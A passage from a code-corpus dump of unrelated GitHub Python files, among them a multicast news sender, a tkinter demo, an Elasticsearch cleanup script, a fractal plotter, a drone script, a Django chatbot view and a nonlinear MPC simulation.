urllib.urlopen(\"http://finance.yahoo.com/rss/topfinstories\")\n except:\n try:\n u = urllib2.urlopen(\"http://finance.yahoo.com/rss/topfinstories\")\n except:\n return(None)\n #endtry\n #endtry\n\n #endtry\n data = u.read()\n data = data[data.find(\"\")::]\n\n messages = []\n count = 0\n host = socket.gethostname()\n output = bold(\"Sent from multicast source '{}'\\n\".format(host))\n while (True):\n index = data.find(\"\")\n if (index == -1): break\n data = data[index+len(\"<title>\")::]\n index = data.find(\"\")\n if (index == -1): break\n title = data[0:index]\n data = data[index::]\n\n index = data.find(\"\")\n if (index == -1): break\n data = data[index+len(\"\")::]\n index = data.find(\"\")\n if (index == -1): break\n link = data[0:index]\n data = data[index::]\n\n index = data.find(\"\")\n if (index == -1): break\n data = data[index+len(\"\")::]\n index = data.find(\"\")\n if (index == -1): break\n pd = data[0:index]\n data = data[index::]\n\n output += \"Headline: {}\\n Date: {}\\n URL: {}\\n\\n\".format( \\\n bold(title), pd, link)\n\n count += 1\n if (count % 3 == 0):\n messages.append(output)\n output = \"\"\n #endif\n #endwhile\n return(messages)\n#enddef\n\n#------------------------------------------------------------------------------\n\n#\n# Get command line parameters.\n# \nif (len(sys.argv) < 3):\n print(usage)\n exit(1)\n#endif\n\nsource = sys.argv[1]\ngroup = sys.argv[2]\ndelay = int(sys.argv[3]) if (len(sys.argv) == 4) else 15\n\nif (source.find(\".\") == -1 or group.find(\".\") == -1):\n print(\"Must supply IPv4 address in dotted decimal\")\n exit(1)\n#endif\n\nport = group.split(\".\")\nport = 0x800 + int(port[-2]) + int(port[-1])\n\n#\n# Open send UDP socket.\n#\nprint(\"Open send socket ({} -> {}:{}) ... \".format(source, group, port),\n end=\" \")\n\ntry:\n msocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n msocket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 32)\n msocket.bind((source, 0))\n print(\"succeeded\")\nexcept:\n print(\"failed\")\n exit(1)\n#endtry\n\n#\n# Start off looping and sending system status.\n#\nwhile (True):\n messages = get_headlines()\n if (messages != None): send_messages(messages)\n\n print(\"Delay {} seconds ... \".format(delay), end=\" \")\n sys.stdout.flush()\n time.sleep(delay)\n print(\"\")\n\n messages = get_cool_message()\n send_messages(messages)\n\n print(\"Delay {} seconds ... \".format(delay), end=\" \")\n sys.stdout.flush()\n time.sleep(delay)\n print(\"\")\n#endwhile\n\nmsocket.close()\nexit(0)\n\n#------------------------------------------------------------------------------\n\n","repo_name":"farinacci/lispers.net","sub_path":"apps/lisp-news-sender.py","file_name":"lisp-news-sender.py","file_ext":"py","file_size_in_byte":4011,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"85"} +{"seq_id":"7143625492","text":"#This imports the tkinter \"tool box\" this contains\n#all of the support material to make GUI elements\n#by including \"as tk\" we are giving a short name to use.\nimport tkinter as tk\n\n\n#Main window\nroot = tk.Tk() #Creates standard window\n# Step one: construct the object: Build and configure it.\n# Step two: Configure the object: Specify behavouir and settings (optional).\n# Step three Pack the object: Put it in the window.\noutput = tk.Text (root,height = 10, width = 30) #Parameters are what are sent\n# ordered parameters: The order I send the parameters matters. (COMMON)\n# Named parameters: JavaScript and python specific\noutput.config(state = \"disable\", background = \"blue\")\noutput.grid(row = 0, column = 0, rowspan = 5)\n\n\n#**********WIDGET 2,3,4 (Labels)************\n\nlabInput1 = tk.Label(root, text = \"input 1\")\nlabInput1.grid(row = 5, column = 0)\n\nlabInput2 = tk.Label(root, text = \"input 2\")\nlabInput2.grid(row = 6, column = 0)\n\nlabInput3 = tk.Label(root, text = \"input 3\")\nlabInput3.grid(row = 7, column = 0)\n\n\n#**********WIDGET 5,6 (Checkboxes)***********\n#How do I track the checkbox state.\nvar1 = IntVar()\nvar2 = Intvar()\n\n\n#What the named parameter variable does is binds the IntVar to the\n#checkbox. If there is a change in the box, there is a change in the variable.\n#This is called BINDING\n\nc = Checkbutton(root, text=\"Expand\", variable=var1)\ncHC.grid(row = 0, column = 1)\n\nc = Checkbutton(root, text=\"Expand\", variable=var2)\ncHC.grid(row = 1, column = 1)\n\n#This is an event driven program\n#Build a GUI\n#Start it running\n#Wait for \"EVENT\"\n\nroot.mainloop() #Starts the program.","repo_name":"sstack6778/Year9Design01PythonSS","sub_path":"StockDataProject/GUIdemoProgram.py","file_name":"GUIdemoProgram.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"30431966756","text":"from pytz import unicode\n\nimport cy_kit\nimport cy_es\nfrom cy_xdoc.services.search_engine import SearchEngine\nse:SearchEngine = cy_kit.singleton(SearchEngine)\nimport re\nimport unicodedata\n\n\ndef no_accent_vietnamese(s):\n s = s.decode('utf-8')\n s = re.sub(u'Đ', 'D', s)\n s = re.sub(u'đ', 'd', s)\n return unicodedata.normalize('NFKD', unicode(s)).encode('ASCII', 'ignore')\nindex= \"lv-codx_lv-docs\"\nitems = cy_es.get_docs(\n client=se.client,\n index= index)\n\nfor x in items:\n cy_es.delete_doc(\n client=se.client,\n index=index,\n id= x.id\n )\n print(x)","repo_name":"nttlong/fs-svc-01","sub_path":"cyx/fix_es.py","file_name":"fix_es.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"75133944276","text":"import matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom matplotlib.animation import FuncAnimation\r\n\r\n\r\ndef next_point(u, v):\r\n j = np.random.randint(0, m)\r\n return alpha * u + (1 - alpha) * X[j], alpha * v + (1 - alpha) * Y[j]\r\n\r\n\r\ndef proportion(n):\r\n half = n // 2\r\n return np.sqrt((1 - np.cos(half * 2 * np.pi / n)) / (1 - np.cos(2 * np.pi / n)))\r\n\r\n\r\ndef alpha_calc(n):\r\n return 1 / (proportion(n) + 1)\r\n\r\n\r\n# parameters:\r\nm = 7 # number of sides\r\nalpha = alpha_calc(m) # next_point = alpha * prev_point + (1 - alpha) * vertex\r\n# alpha = 0.33\r\nN = 100000 # number of points\r\nanimation = False\r\n\r\nfig = plt.figure(figsize=(7, 7))\r\nplt.xlim(-1.1, 1.1)\r\nplt.ylim(-1.1, 1.1)\r\n\r\n# polygon\r\nX = np.cos(2 * np.pi * np.array(range(m)) / m)\r\nY = np.sin(2 * np.pi * np.array(range(m)) / m)\r\n\r\nA = []\r\nB = []\r\na, b = np.random.uniform(-1, 1), np.random.uniform(-1, 1)\r\nfor _ in range(N):\r\n a, b = next_point(a, b)\r\n A.append(a)\r\n B.append(b)\r\n\r\nif animation:\r\n graph, = plt.plot([], [], 'g.')\r\n\r\n def animate(i):\r\n graph.set_data(A[:i+1], B[:i+1])\r\n return graph\r\n\r\n plt.plot(X, Y, 'ro')\r\n ani = FuncAnimation(fig, animate, frames=N, interval=1)\r\n\r\nelse:\r\n plt.plot(X, Y, 'ro')\r\n plt.plot(A, B, 'g,')\r\n\r\nprint(f'alpha = {alpha}')\r\nplt.show()\r\n","repo_name":"vadimrogov0610/polygon_fractals","sub_path":"polygon_fractals.py","file_name":"polygon_fractals.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"1236541413","text":"# Tee ratkaisusi tähän:\nfrom turtle import Vec2D\n\n\nclass Maksukortti:\n def __init__(self, alkusaldo: float):\n\n self.saldo = alkusaldo\n\n def __str__(self):\n\n return f\"Kortilla on rahaa {self.saldo:.1f} euroa\"\n\n def syo_edullisesti(self):\n\n if self.saldo >= 2.6:\n\n self.saldo -= 2.6\n\n\n def syo_maukkaasti(self):\n\n if self.saldo >= 4.6:\n\n self.saldo -= 4.6\n\n def lataa_rahaa(self, lataa: float):\n\n if lataa < 0:\n raise ValueError\n else:\n self.saldo += lataa\n\n\n\n\npekan_kortti = Maksukortti(20)\nmatin_kortti = Maksukortti(30)\n\npekan_kortti.syo_maukkaasti()\nmatin_kortti.syo_edullisesti()\n\nprint(\"Pekka: \" + str(pekan_kortti))\nprint(\"Matti: \" + str(matin_kortti))\n\npekan_kortti.lataa_rahaa(20)\nmatin_kortti.syo_maukkaasti()\n\nprint(\"Pekka: \" + str(pekan_kortti))\nprint(\"Matti: \" + str(matin_kortti))\n\npekan_kortti.syo_edullisesti()\npekan_kortti.syo_edullisesti()\n\nmatin_kortti.lataa_rahaa(50)\n\nprint(\"Pekka: \" + str(pekan_kortti))\nprint(\"Matti: \" + str(matin_kortti))\n\n\n\n\n\n\n","repo_name":"gary8x6/mooc-ohjelmointi-2022","sub_path":"osa08-13_maksukortti/src/maksukortti.py","file_name":"maksukortti.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"fi","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"16325020505","text":"import os.path\nimport json\nfrom datetime import datetime\nfrom models.borrow_data import borrow_data\n\n\nclass borrow_data_repository:\n NAME = \"db/borrow.json\"\n\n\n def load(self):\n self.borrow_data_list = []\n\n # Check if file exists.\n if not os.path.isfile(borrow_data_repository.NAME):\n return\n\n # Reading file.\n with open(borrow_data_repository.NAME, \"r\") as infs:\n raw = json.load(infs)\n\n if not raw[\"data\"] or not isinstance(raw[\"data\"], list):\n # Invalid file content.\n infs.close()\n os.unlink(borrow_data_repository.NAME)\n else:\n # Deserializing.\n for r in raw[\"data\"]:\n b = borrow_data()\n b.nim = r[\"nim\"]\n b.isbn = r[\"isbn\"]\n b.start_date = datetime.fromtimestamp(r[\"start_date\"])\n b.is_returned = r[\"is_returned\"]\n b.return_date = datetime.fromtimestamp(r[\"return_date\"])\n self.borrow_data_list.append(b)\n\n\n def save(self):\n if not os.path.isdir(\"db\"): os.mkdir(\"db\")\n\n with open(borrow_data_repository.NAME, \"w+\") as outfs:\n # Serializing.\n raw = {}\n raw[\"data\"] = []\n\n for b in self.borrow_data_list:\n r = {}\n r[\"nim\"] = b.nim\n r[\"isbn\"] = b.isbn\n r[\"start_date\"] = b.start_date.timestamp()\n r[\"is_returned\"] = b.is_returned \n r[\"return_date\"] = b.return_date.timestamp()\n raw[\"data\"].append(r)\n\n # Saving.\n json.dump(raw, outfs)\n\n\n def __init__(self):\n self.load()\n\n\n def create(self, borrow_data):\n self.borrow_data_list.append(borrow_data)\n self.save()\n\n\n def get(self, nim, isbn):\n result = None\n\n for data in self.borrow_data_list:\n if data.nim == nim and data.isbn == isbn:\n # Get the last entry.\n result = data\n\n return result\n\n\n def list_non_returned(self):\n return [\n x for x in self.borrow_data_list\n if not x.is_returned\n ]\n\n\n def set_return_date(self, nim, isbn, date):\n data = self.get(nim, isbn)\n data.is_returned = True\n data.return_date = date\n self.save()\n\n\n def delete_by_nim(self, nim):\n self.borrow_data_list = [\n x for x in self.borrow_data_list\n if x.nim != nim\n ]\n self.save()\n\n\n def delete_by_isbn(self, isbn):\n self.borrow_data_list = [\n x for x in self.borrow_data_list\n if x.isbn != isbn\n ]\n self.save()","repo_name":"ivanjx/college","sub_path":"old/smt3/librarian/repositories/borrow_data_repository.py","file_name":"borrow_data_repository.py","file_ext":"py","file_size_in_byte":2772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"8743325451","text":"from djitellopy import Tello\nimport tkinter, time, winsound\n\ndef warning():\n for n in range(4): # 4 short beeps\n winsound.Beep(1500, 500)\n time.sleep(0.5)\n winsound.Beep(1500, 1000) # 1 long beep\n\ntello = Tello()\ntello.connect()\n# Activate the mission pads\ntello.enable_mission_pads()\ntello.set_mission_pad_detection_direction(0) # use downward camera\n# Take off\nwarning()\ntello.takeoff()\ntello.send_rc_control(0, 30, 0, 0) # Move forward\n\npad = tello.get_mission_pad_id() # Look for a mission pad\nwhile pad != 1: # While we don't see pad 1\n if pad == 4: # If we see pad 4\n winsound.Beep(2500, 500)\n pad = tello.get_mission_pad_id()# Take another look\n\n# Land\ntello.disable_mission_pads()\ntello.land()\ntello.end()\n\n","repo_name":"paulbaumgarten/tello-drone-experimenting","sub_path":"mission-pads-demo.py","file_name":"mission-pads-demo.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"8685977174","text":"# update method\n\nuser_info={\n 'name':'uttam',\n 'age': 18,\n 'fav_movies': ['1899'],\n 'fav_tunes': ['animals','24k magic'],\n}\n\nmore_info= {'state' : 'DELHI', 'hobbies' : ['coding','reading','chess']}\nuser_info.update({})\nprint(user_info)\n","repo_name":"uttam-aggarwal/week2-Python-CipherSchools","sub_path":"lecture120-Update_Dictionary-CipherSchools.py","file_name":"lecture120-Update_Dictionary-CipherSchools.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"30704913158","text":"# https://www.acmicpc.net/problem/11375\nimport sys\nfrom collections import defaultdict\n\nread = sys.stdin.readline\nn, m = map(int, read().strip().split())\nadj = defaultdict(list)\nfor i in range(1, n + 1):\n adj[i].extend(list(map(int, read().strip().split()[1:])))\n\nworks = [0 for _ in range(m + 1)]\n\n\ndef dfs(cur):\n for nxt in adj[cur]:\n if visit[nxt]:\n continue\n visit[nxt] = True\n\n if works[nxt] == 0 or dfs(works[nxt]):\n works[nxt] = cur\n return True\n return False\n\n\nfor i in range(1, n + 1):\n visit = [False for _ in range(m + 1)]\n dfs(i)\n\nprint(len(list(filter(lambda x: x != 0, works))))\n","repo_name":"naemoo/Algorithm-Python","sub_path":"Network Flow/Problem03.py","file_name":"Problem03.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"17068377706","text":"'''\r\nFile Name : baseline_activities.py\r\nAuthor Name : Lakshmi Damodara\r\nCreation Date : 02/02/2018\r\nUpdation Date :\r\nVersion : 1.0\r\nDescription :\r\n\r\nThis program reads the Solar CCT excel file and gets the baseline data to populate public.activities table\r\nThe cell positions for data values are given in the config file excel_activity_config.ini file.\r\n\r\nFunctions:\r\nconverDate, getActivityNameCellPosition, getUnitNameCellPosition, getContractorNameCellPosition\r\ngetPlannedStartCellPosition, getPlannedEndCellPosition\r\n\r\nFiles need to run this program:\r\n1. excel_activity_config.ini\r\n2. excel_config.ini\r\n\r\nProgram dependencies:\r\n1. excel_config_reader.py\r\n2. excel_writing.py\r\n3. excel_utilities.py\r\n\r\nLog File\r\n1. log_file.txt : has been set at the DEBUG level to log all activities at run time.\r\n\r\n'''\r\n\r\nimport datetime\r\nimport xlrd\r\n\r\n### -- Start of Functions --------\r\n# function to convert dates to string in mmddyyyy format\r\ndef convertDate(dtt):\r\n return datetime.datetime.date(dtt) # returns just the date in mm-dd-yyyy format\r\n\r\n#returns the cell position of project name from excel_activity_config.ini\r\ndef getProjectName(config):\r\n return config['Project']['projectName']\r\n\r\ndef getActivityNameCellPosition(config, pos): #returns the value of activities_name from excel_act_tble_config.ini\r\n keyVal = 'activities' + str(pos)\r\n cell_postion = config[keyVal]['activities_name']\r\n return cell_postion\r\n\r\n#returns the value of unit name from excel_act_tble_config.ini\r\ndef getUnitNameCellPosition(config, pos):\r\n keyVal = 'activities' + str(pos)\r\n cell_postion = config[keyVal]['activities_unit_name']\r\n return cell_postion\r\n\r\n#returns the value of contractor name from excel_act_tble_config.ini\r\ndef getContractorNameCellPosition(config, pos):\r\n keyVal = 'activities' + str(pos)\r\n cell_postion = config[keyVal]['activities_contractor_name']\r\n return cell_postion\r\n\r\n#returns the value of planned start date from excel_act_tble_config.ini\r\ndef getPlannedStartCellPosition(config, pos):\r\n keyVal = 'activities' + str(pos)\r\n cell_postion = config[keyVal]['activities_planned_start']\r\n return cell_postion\r\n\r\n#returns the value of planned end date from excel_act_tble_config.ini\r\ndef getPlannedEndCellPosition(config, pos):\r\n keyVal = 'activities' + str(pos)\r\n cell_postion = config[keyVal]['activities_planned_end']\r\n return cell_postion\r\n\r\n#function to get output file config, name for writing out the results csv file\r\n#def outfile(config):\r\n# return config['outputFileName']['fname']\r\n\r\n#function to get output directory file name for writing out the results csv file\r\n#def outfileDir(config):\r\n# return config['outputFileName']['fdirectory']\r\n\r\n# returns incremented value of a variable\r\ndef incrementfnc(tval):\r\n tval = tval + 1\r\n return tval\r\n\r\ndef prResultData(rList):\r\n print(rList)\r\n\r\n# Function to call the activities table and insert activity_name, unit_name etc into activities table\r\ndef updateBaseLineActivities(dbh, db_conn, final_list):\r\n # SQL for inserting data into public.activities table\r\n for i in range(0, len(final_list)):\r\n activityName = str(final_list[i][0])\r\n unit_name = str(final_list[i][1])\r\n contractor_name = final_list[i][2]\r\n # convert the string to yymmdd to be inserted\r\n planned_start = datetime.datetime.strptime(final_list[i][3],\"%m%d%Y\").date().strftime('%Y%m%d')\r\n planned_end = datetime.datetime.strptime(final_list[i][4], \"%m%d%Y\").date().strftime('%Y%m%d')\r\n project_name = final_list[i][5]\r\n execSQL = \"INSERT INTO temp.activities (name, unit_name, contractor_name, planned_start, planned_end, project_name) values (%s,%s,%s,%s,%s,%s);\"\r\n execData = (activityName, unit_name, contractor_name, planned_start, planned_end,project_name)\r\n dbh.executeQueryWithData(db_conn, execSQL, execData)\r\n\r\n### ---------End of Functions -----\r\n\r\n\r\ndef processBaselineActivities(act_wb, eut, dbh, config):\r\n ## Open db connection\r\n db_conn = dbh.getConn()\r\n\r\n print('Function: processBaselineActivities........')\r\n\r\n # getting the active worksheet\r\n wrksheet_names = act_wb.sheet_names()\r\n\r\n #get the total activities in the sheet\r\n tot_activity = config['TotalActivities']['total_activities']\r\n\r\n # initializing a list\r\n Final_List = list()\r\n\r\n # This for loop is to go through the excel sheet\r\n # Take key values of excel_act_tble_config.ini as arguments\r\n # search each cell to get the values\r\n #logging.debug('Entering into For loop to get values from excel sheet')\r\n print('Entering into For loop to get values from excel sheet')\r\n\r\n # get the active sheet\r\n activityName_active_sheet = wrksheet_names[0]\r\n # pass the active sheet name\r\n sheet = act_wb.sheet_by_index(0)\r\n L1 = []\r\n\r\n #-----------------------------------------\r\n # Getting the project Name from the sheet\r\n #------------------------------------------\r\n projectName_cell = getProjectName(config)\r\n # reading the cell address and getting the value in rows,columns\r\n projectName_position = eut.getRowColumn(projectName_cell)\r\n # getting the project name\r\n projectName = sheet.cell_value(projectName_position[0],projectName_position[1])\r\n\r\n for i in range(0,int(tot_activity)):\r\n #getting activity name\r\n ancp = getActivityNameCellPosition(config, i)\r\n acrc = eut.getRowColumn(ancp)\r\n L_activityName_cell_value = sheet.cell_value(acrc[0],acrc[1])\r\n\r\n #getting unit name\r\n auncp = getUnitNameCellPosition(config, i)\r\n aunrc = eut.getRowColumn(auncp)\r\n L_activities_unit_name_cell_value = sheet.cell_value(aunrc[0],aunrc[1])\r\n\r\n #getting the contractor name\r\n acncp = getContractorNameCellPosition(config, i)\r\n acnrc = eut.getRowColumn(acncp)\r\n L_activities_contractor_name_cell_value = sheet.cell_value(acnrc[0],acnrc[1])\r\n\r\n #getting the planned start date\r\n apscp = getPlannedStartCellPosition(config, i)\r\n apscrc = eut.getRowColumn(apscp)\r\n a1 = sheet.cell_value(apscrc[0],apscrc[1])\r\n a1_as_datetime = datetime.datetime(*xlrd.xldate_as_tuple(a1, act_wb.datemode))\r\n L_activities_planned_start_date = convertDate(a1_as_datetime).strftime('%m%d%Y')\r\n\r\n #getting the planned end date\r\n apecp = getPlannedEndCellPosition(config, i)\r\n apecrc = eut.getRowColumn(apecp)\r\n a1 = sheet.cell_value(apecrc[0],apecrc[1])\r\n a1_as_datetime = datetime.datetime(*xlrd.xldate_as_tuple(a1, act_wb.datemode))\r\n L_activities_planned_end_date = convertDate(a1_as_datetime).strftime('%m%d%Y')\r\n\r\n # Depending on the number of activities, the if loop will load the list\r\n j = i - 1\r\n L1.insert(j,L_activityName_cell_value)\r\n L1.insert(incrementfnc(j+1),L_activities_unit_name_cell_value)\r\n L1.insert(incrementfnc(j+2),L_activities_contractor_name_cell_value)\r\n L1.insert(incrementfnc(j+3),L_activities_planned_start_date)\r\n L1.insert(incrementfnc(j+4),L_activities_planned_end_date)\r\n L1.insert(incrementfnc(j+5), projectName)\r\n\r\n final_list = [L1]\r\n print(final_list)\r\n\r\n # output file\r\n # output_FileName1 = outfileDir(config ) + str(outfile(config))\r\n # output_FileName = output_FileName1.replace(\"'\",\"\")\r\n # Now pass the list along with filename to the writer python file\r\n #eut.writeCSVFile(output_FileName,final_list)\r\n\r\n updateBaseLineActivities(dbh, db_conn, final_list)\r\n L1 = []\r\n\r\n # Now update the public.activities table\r\n stProcedure = \"SELECT update_baseline_activities()\"\r\n dbh.executeQuery(db_conn,stProcedure)\r\n db_conn.close()\r\n\r\n # close or delete all the open instances, Lists, and connections\r\n # clear all the variables from memory\r\n del final_list\r\n del L1\r\n\r\n\r\n# --- End of Program ---","repo_name":"lakshmidamodara/cct-dataloader","sub_path":"baseline_activities.py","file_name":"baseline_activities.py","file_ext":"py","file_size_in_byte":7955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"33360322276","text":"from django.shortcuts import render\nfrom .models import Enquiry\nfrom bot.chat import get_response\nimport json\nfrom django.http import JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\n# Create your views here.\n\n\ndef index(request):\n if request.method == \"POST\":\n first_name = request.POST['firstname']\n last_name = request.POST['lastname']\n email_address = request.POST['email']\n services_rendered = request.POST['services']\n message = request.POST['message']\n enquiry = Enquiry.objects.create(firstname= request.POST['firstname'],lastname=request.POST['lastname'],\n email=request.POST['email'],services=request.POST['services'],message=request.POST['message'])\n enquiry.save()\n\n\n\n return render(request,\"index.html\")\n\n\n@csrf_exempt\ndef botts(request):\n data = json.loads(request.body)\n message = data['message']\n response = get_response(message)\n messg = {\"answer\": response}\n re = messg[\"answer\"]\n # message = {\"answer\": response}\n # return jsonify(message)\n\n\n\n return JsonResponse({\"answer\": re })\n\n\n","repo_name":"Zeecoworld/portfolio-site-ai-chatbot","sub_path":"zeecoapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"16107410178","text":"from NonlinearController.model_utils import *\nfrom NonlinearController.systems import UnbalancedDisc\nfrom matplotlib import pyplot as plt\nimport deepSI\nfrom casadi import *\nimport torch\nimport random\nimport time\n\n################## Utility functions #######################\n\ndef randomLevelReference(Nsim, nt_range, level_range):\n x_reference_list = np.array([])\n Nsim_remaining = Nsim\n while True:\n Nsim_steps = random.randint(nt_range[0],nt_range[1])\n Nsim_remaining = Nsim_remaining - Nsim_steps\n x_reference_list = np.hstack((x_reference_list, np.ones(Nsim_steps)*random.randint(level_range[0]*10,level_range[1]*10)/10))\n\n if Nsim_remaining <= 0:\n x_reference_list = x_reference_list[:Nsim]\n break\n return x_reference_list\n\ndef setPointInput(y_ref):\n g = 9.80155078791343\n J = 0.000244210523960356\n Km = 10.5081817407479\n I = 0.0410772235841364\n M = 0.0761844495320390\n tau = 0.397973147009910\n\n return (tau * M * g * I)/(Km * J) * np.sin(y_ref)\n\n################## System #######################\ndt = 0.1\nsystem = UnbalancedDisc(dt=dt)\nsystem.reset_state()\n\n################## MPC variable specification #######################\nmodel = deepSI.load_system(\"NonlinearController/trained_models/unbalanced/ObserverUnbalancedDisk_dt01_nab_4_SNR_30_e250\")\n# model = deepSI.load_system(\"NonlinearController/trained_models/unbalanced/ud_test_4\")\nNc=5; nr_sim_steps = 100\n\nQ = 100; R = 1\n\nw_min = -4.0; w_max = 4.0\nq_min = [-1.2]; q_max = [1.2]\nw0 = 0; q0 = 0\n\na = 0.9; reference = np.hstack((np.ones(20)*a,np.ones(20)*-a,np.ones(20)*a/2,np.ones(20)*-a/2,np.ones(40)*0))\nreference = np.load(\"references/multisine.npy\")\n\n# reference = randomLevelReference(nr_sim_steps+Nc, [25,30], [-1,1])\n# reference = deepSI.deepSI.exp_design.multisine(nr_sim_steps+Nc+1, pmax=20, n_crest_factor_optim=20)/2.0\n# reference = np.load(\"NonlinearController/references/setPoints.npy\")\n# reference = np.sin(np.arange(0,nr_sim_steps+Nc)/np.pi*3.5)*1\n# x_reference_list = 1*np.load(\"NonlinearController/references/randomLevelTime25_30Range-1_1Nsim500.npy\")\n# reference = x_reference_list[1,:]\n\n################## Offline Computation #######################\nnx = model.nx\nx = MX.sym(\"x\",nx,1)\nnu = model.nu if model.nu is not None else 1\nu = MX.sym(\"u\",nu,1)\nny = model.ny if model.ny is not None else 1\n\n# convert torch nn to casadi function\nx_rhs = CasADi_Fn(model, x, u)\ny_rhs = CasADi_Hn(model, x)\n\nf = Function('f', [x, u], [x_rhs])\nh = Function('h', [x], [y_rhs])\n\n# normalize initial input and output\nnorm = model.norm\nu0 = norm_input(w0, norm)\ny0 = norm_output(q0, norm)\n\nu_min = norm_input(w_min, norm); u_max = norm_input(w_max, norm)\ny_min = norm_output(q_min, norm); y_max = norm_output(q_max, norm)\n\n# initialize observer history input and output\nnb = model.nb\nuhist = torch.ones((1,nb))*u0\nna = model.na\nyhist = torch.ones((1,na+1))*y0\n\n# define initial predicted states and inputs\nX0 = np.tile(model.encoder(uhist,yhist).detach().numpy().T,Nc+1)\nU0 = np.ones((Nc)*nu)[np.newaxis]*u0\nY0 = np.ones((Nc)*ny)[np.newaxis]*y0\n\n# define opti stack\nopti = Opti()\n\nstates = opti.variable(nx, Nc+1)\ncontrols = opti.variable(nu, Nc)\noutputs = opti.variable(ny, Nc)\n\nx_initial = opti.parameter(nx, 1)\ny_ref = opti.parameter(ny, Nc)\nu_ref = opti.parameter(nu, Nc)\n\nopti.subject_to(opti.bounded(y_min,outputs,y_max))\nopti.subject_to(opti.bounded(u_min,controls,u_max))\nopti.subject_to(states[:,0] == x_initial)\n\nopti.set_initial(states, X0)\nopti.set_initial(controls, U0)\nopti.set_initial(outputs, Y0)\n\nopti.set_value(x_initial,X0[:,0])\n# opti.set_value(y_ref, reference[:Nc])\n\nopts = {'print_time' : 0, 'ipopt': {'print_level': 0}}\nopti.solver(\"ipopt\",opts)\n\nobjective = 0\nfor i in np.arange(Nc):\n opti.subject_to(states[:,i+1] == f(states[:,i], controls[:,i]))\n opti.subject_to(outputs[:,i] == h(states[:,i+1]))\n objective = (objective + \n mtimes(mtimes((outputs[:,i] - y_ref[:,i]).T,Q),(outputs[:,i] - y_ref[:,i])) +\n mtimes(mtimes((controls[:,i] - u_ref[:,i]).T,R),(controls[:,i] - u_ref[:,i])))\n\nopti.minimize(objective)\n\n################## Logging #######################\nlog_q = np.zeros((ny,nr_sim_steps))\nlog_w = np.zeros((nu,nr_sim_steps))\n\nlog_comp_t = np.zeros((2, nr_sim_steps))\n\n################## Online Computation #######################\n\n#++++++++++++++++++ start simulation step +++++++++++++++++++++++\nfor k in range(nr_sim_steps):\n component_start = time.time()\n \n opti.set_value(y_ref, norm_output(reference[k:k+Nc], norm))\n opti.set_value(u_ref, norm_input(setPointInput(reference[k:k+Nc]), norm))\n\n log_comp_t[0, k] = log_comp_t[0, k] + time.time() - component_start\n component_start = time.time()\n\n sol = opti.solve()\n\n log_comp_t[1, k] = log_comp_t[1, k] + time.time() - component_start\n component_start = time.time()\n\n U0[0,:] = sol.value(controls)\n X0[:,:] = sol.value(states)\n Y0[:,:] = sol.value(outputs)\n\n # determine input from optimal velocity input\n u0 = U0[:,0]\n # denormalize input\n w0 = denorm_input(u0, norm)\n # measure output then apply input\n system.x = system.f(system.x, w0[0])\n q1 = system.h(system.x, w0[0])\n # normalize output\n y1 = norm_output(q1, norm)\n\n # shift history input and output for encoder\n for j in range(nb-1):\n uhist[0,j] = uhist[0,j+1]\n uhist[0,nb-1] = torch.Tensor(u0)\n for j in range(na):\n yhist[0,j] = yhist[0,j+1]\n yhist[0,na] = torch.Tensor([y1])\n # predict state with encoder\n x1 = model.encoder(uhist,yhist)\n\n # shift predicted states, input, and output one time step k\n X0[:, :-1] = X0[:, 1:]; X0[:, -1:] = X0[:, -2:-1]; X0[:, :1] = x1.detach().numpy().T\n U0[:, :-1] = U0[:, 1:]; U0[:, -1:] = U0[:, -2:-1]#; U0[:, :1] = u0\n Y0[:, :-1] = Y0[:, 1:]; Y0[:, -1:] = Y0[:, -2:-1]; Y0[:, :1] = y1\n\n opti.set_initial(states, X0)\n opti.set_initial(controls, U0)\n opti.set_initial(outputs, Y0)\n opti.set_value(x_initial,X0[:,0])\n\n # log system signals\n log_q[:,k] = q1\n log_w[:,k] = w0\n\n log_comp_t[0, k] = log_comp_t[0, k] + time.time() - component_start\n\n # print progress\n # print(\"Sim step: \" + str(k))\n \n#++++++++++++++++++ end simulation step +++++++++++++++++++++++\n\nfig1 = plt.figure(figsize=[12, 8])\n\nplt.subplot(1,2,1)\nplt.plot(np.arange(nr_sim_steps)*dt, log_w[0,:], label='input')\nplt.plot(np.arange(nr_sim_steps)*dt, np.ones(nr_sim_steps)*w_max, 'r-.')#, label='max')\nplt.plot(np.arange(nr_sim_steps)*dt, np.ones(nr_sim_steps)*w_min, 'r-.')#, label='min')\n# plt.xlabel(\"time [s]\")\nplt.ylabel(\"voltage [V]\")\nplt.grid()\nplt.legend(loc='upper right')\n\nplt.subplot(1,2,2)\nplt.plot(np.arange(nr_sim_steps)*dt, log_q[0,:], label='output')\nplt.plot(np.arange(nr_sim_steps)*dt, reference[:nr_sim_steps], '--', label='reference')\nplt.plot(np.arange(nr_sim_steps)*dt, np.ones(nr_sim_steps)*q_max[0], 'r-.')#, 